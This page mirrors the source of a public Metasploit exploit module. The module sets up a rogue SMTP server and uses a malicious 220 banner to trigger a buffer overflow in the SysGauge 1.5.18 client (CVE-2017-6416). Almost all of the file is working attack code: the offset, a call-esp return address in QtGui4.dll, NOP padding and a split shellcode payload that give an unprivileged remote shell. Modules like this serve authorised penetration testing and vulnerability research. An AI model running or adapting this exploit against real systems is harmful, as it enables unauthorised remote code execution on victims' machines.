CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/smtp/sysgauge_client_bof.rb
Views: 1904
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  include Msf::Exploit::Remote::TcpServer

8


9
  Rank = NormalRanking

10


11
  def initialize()

12
    super(

13
      'Name'           => 'SysGauge SMTP Validation Buffer Overflow',

14
      'Description'    => %q{

15
        This module will setup an SMTP server expecting a connection from SysGauge 1.5.18

16
        via its SMTP server validation. The module sends a malicious response along in the

17
        220 service ready response and exploits the client, resulting in an unprivileged shell.

18
      },

19
      'Author'         =>

20
      [

21
        'Chris Higgins', # msf Module -- @ch1gg1ns

22
        'Peter Baris'    # Initial discovery and PoC

23
      ],

24
      'License'        => MSF_LICENSE,

25
      'References'     =>

26
      [

27
        [ 'CVE', '2017-6416' ],

28
        [ 'EDB', '41479' ],

29
      ],

30
      'DefaultOptions' =>

31
      {

32
        'EXITFUNC' => 'thread'

33
      },

34
      'Payload'        =>

35
      {

36
        'Space' => 306,

37
        'BadChars' => "\x00\x0a\x0d\x20"

38
      },

39
      'Platform'  => 'win',

40
      'Targets'       =>

41
      [

42
        [ 'Windows Universal',

43
          {

44
            'Offset' => 176,

45
            'Ret'    => 0x6527635E # call esp # QtGui4.dll

46
          }

47
        ]

48
      ],

49
      'Privileged'    => false,

50
      'DisclosureDate' => 'Feb 28 2017',

51
      'DefaultTarget' => 0

52
      )

53
    register_options(

54
      [

55
      OptPort.new('SRVPORT', [ true, "The local port to listen on.", 25 ]),

56
      ])

57
  end

58


59
  def on_client_connect(c)

60
    # Note here that the payload must be split into two parts.

61
    # The payload gets jumbled in the stack so we need to split

62
    # and align to get it to execute correctly.

63
    sploit =  "220 "

64
    sploit << rand_text(target['Offset'])

65
    # Can only use the last part starting from 232 bytes in

66
    sploit << payload.encoded[232..-1]

67
    sploit << rand_text(2)

68
    sploit << [target.ret].pack('V')

69
    sploit << rand_text(12)

70
    sploit << make_nops(8)

71
    # And the first part up to 232 bytes

72
    sploit << payload.encoded[0..231]

73
    sploit << "ESMTP Sendmail \r\n"

74


75
    print_status("Client connected: " + c.peerhost)

76
    print_status("Sending payload...")

77


78
    c.put(sploit)

79
  end

80
end

81


82